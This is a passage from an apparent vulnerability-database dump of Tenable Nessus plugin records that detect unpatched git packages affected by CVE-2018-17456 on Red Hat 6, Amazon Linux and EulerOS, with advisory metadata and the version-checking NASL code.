This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/77.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2018-17456\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:0316\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1636619\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17456\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(77);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/03\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::computenode\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Git\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'enterprise_linux_6_client': [\n 'rhel-6-desktop-debug-rpms',\n 'rhel-6-desktop-fastrack-debug-rpms',\n 'rhel-6-desktop-fastrack-rpms',\n 'rhel-6-desktop-fastrack-source-rpms',\n 'rhel-6-desktop-optional-debug-rpms',\n 'rhel-6-desktop-optional-fastrack-debug-rpms',\n 'rhel-6-desktop-optional-fastrack-rpms',\n 'rhel-6-desktop-optional-fastrack-source-rpms',\n 'rhel-6-desktop-optional-rpms',\n 'rhel-6-desktop-optional-source-rpms',\n 'rhel-6-desktop-rpms',\n 'rhel-6-desktop-source-rpms'\n ],\n 'enterprise_linux_6_computenode': [\n 'rhel-6-for-hpc-node-fastrack-debug-rpms',\n 'rhel-6-for-hpc-node-fastrack-rpms',\n 'rhel-6-for-hpc-node-fastrack-source-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-debug-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-source-rpms',\n 
'rhel-6-hpc-node-debug-rpms',\n 'rhel-6-hpc-node-optional-debug-rpms',\n 'rhel-6-hpc-node-optional-rpms',\n 'rhel-6-hpc-node-optional-source-rpms',\n 'rhel-6-hpc-node-rpms',\n 'rhel-6-hpc-node-source-rpms',\n 'rhel-hpc-node-6-eus-sfs-debug-rpms',\n 'rhel-hpc-node-6-eus-sfs-source-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-debug-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-source-rpms'\n ],\n 'enterprise_linux_6_server': [\n 'rhel-6-for-system-z-debug-rpms',\n 'rhel-6-for-system-z-fastrack-debug-rpms',\n 'rhel-6-for-system-z-fastrack-rpms',\n 'rhel-6-for-system-z-fastrack-source-rpms',\n 'rhel-6-for-system-z-optional-debug-rpms',\n 'rhel-6-for-system-z-optional-fastrack-debug-rpms',\n 'rhel-6-for-system-z-optional-fastrack-rpms',\n 'rhel-6-for-system-z-optional-fastrack-source-rpms',\n 'rhel-6-for-system-z-optional-rpms',\n 'rhel-6-for-system-z-optional-source-rpms',\n 'rhel-6-for-system-z-rpms',\n 'rhel-6-for-system-z-source-rpms',\n 'rhel-6-server-debug-rpms',\n 'rhel-6-server-fastrack-debug-rpms',\n 'rhel-6-server-fastrack-rpms',\n 'rhel-6-server-fastrack-source-rpms',\n 'rhel-6-server-optional-debug-rpms',\n 'rhel-6-server-optional-fastrack-debug-rpms',\n 'rhel-6-server-optional-fastrack-rpms',\n 'rhel-6-server-optional-fastrack-source-rpms',\n 'rhel-6-server-optional-rpms',\n 'rhel-6-server-optional-source-rpms',\n 'rhel-6-server-rpms',\n 'rhel-6-server-source-rpms',\n 'rhel-ha-for-rhel-6-server-debug-rpms',\n 'rhel-ha-for-rhel-6-server-rpms',\n 'rhel-ha-for-rhel-6-server-source-rpms',\n 'rhel-lb-for-rhel-6-server-debug-rpms',\n 'rhel-lb-for-rhel-6-server-rpms',\n 'rhel-lb-for-rhel-6-server-source-rpms',\n 'rhel-rs-for-rhel-6-server-debug-rpms',\n 'rhel-rs-for-rhel-6-server-rpms',\n 'rhel-rs-for-rhel-6-server-source-rpms',\n 'rhel-scalefs-for-rhel-6-server-debug-rpms',\n 'rhel-scalefs-for-rhel-6-server-rpms',\n 'rhel-scalefs-for-rhel-6-server-source-rpms'\n ],\n 'enterprise_linux_6_workstation': [\n 
'rhel-6-workstation-debug-rpms',\n 'rhel-6-workstation-fastrack-debug-rpms',\n 'rhel-6-workstation-fastrack-rpms',\n 'rhel-6-workstation-fastrack-source-rpms',\n 'rhel-6-workstation-optional-debug-rpms',\n 'rhel-6-workstation-optional-fastrack-debug-rpms',\n 'rhel-6-workstation-optional-fastrack-rpms',\n 'rhel-6-workstation-optional-fastrack-source-rpms',\n 'rhel-6-workstation-optional-rpms',\n 'rhel-6-workstation-optional-source-rpms',\n 'rhel-6-workstation-rpms',\n 'rhel-6-workstation-source-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-debug-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2020:0316');\n}\n\npkgs = [\n {'reference':'emacs-git-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'emacs-git-el-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-1.7.1-10.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-1.7.1-10.el6_10', 'cpu':'s390x', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 
'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-1.7.1-10.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-all-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-cvs-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-daemon-1.7.1-10.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-daemon-1.7.1-10.el6_10', 'cpu':'s390x', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-daemon-1.7.1-10.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-email-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-gui-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-svn-1.7.1-10.el6_10', 'release':'6', 
'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'gitk-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'gitweb-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'perl-Git-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if 
(contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'emacs-git / emacs-git-el / git / git-all / git-cvs / git-daemon / etc');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:19:57", "description": "Git before 2.14.5, allows remote code execution during processing of a\nrecursive 'git clone' of a superproject if a .gitmodules file has a\nURL field beginning with a '-' character.(CVE-2018-17456)", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-19T00:00:00", "title": "Amazon Linux AMI : git (ALAS-2018-1093)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:gitweb", "p-cpe:/a:amazon:linux:git-bzr", "p-cpe:/a:amazon:linux:git-p4", "p-cpe:/a:amazon:linux:git-svn", "p-cpe:/a:amazon:linux:git-cvs", "p-cpe:/a:amazon:linux:git-debuginfo", "p-cpe:/a:amazon:linux:perl-Git-SVN", "p-cpe:/a:amazon:linux:git-email", "p-cpe:/a:amazon:linux:git-daemon", "p-cpe:/a:amazon:linux:git-all", "p-cpe:/a:amazon:linux:emacs-git", "p-cpe:/a:amazon:linux:git", "p-cpe:/a:amazon:linux:git-hg", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:perl-Git", "p-cpe:/a:amazon:linux:emacs-git-el"], "id": "ALA_ALAS-2018-1093.NASL", "href": 
"https://www.tenable.com/plugins/nessus/118213", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2018-1093.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118213);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-17456\");\n script_xref(name:\"ALAS\", value:\"2018-1093\");\n\n script_name(english:\"Amazon Linux AMI : git (ALAS-2018-1093)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Git before 2.14.5, allows remote code execution during processing of a\nrecursive 'git clone' of a superproject if a .gitmodules file has a\nURL field beginning with a '-' character.(CVE-2018-17456)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2018-1093.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update git' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"emacs-git-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"emacs-git-el-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-all-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-bzr-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-cvs-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-daemon-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-debuginfo-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-email-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-hg-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-p4-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-svn-2.14.5-1.59.amzn1\")) flag++;\nif 
(rpm_check(release:\"ALA\", reference:\"gitweb-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Git-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Git-SVN-2.14.5-1.59.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T08:54:18", "description": "According to the version of the git packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - git: arbitrary code execution via .gitmodules\n (CVE-2018-17456)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-12-10T00:00:00", "title": "EulerOS 2.0 SP3 : git (EulerOS-SA-2018-1388)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2018-12-10T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1388.NASL", "href": "https://www.tenable.com/plugins/nessus/119516", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119516);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2018-17456\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : git (EulerOS-SA-2018-1388)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the git packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - git: arbitrary code execution via .gitmodules\n (CVE-2018-17456)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1388\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cfe4aed\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-1.8.3.1-20.h1\",\n 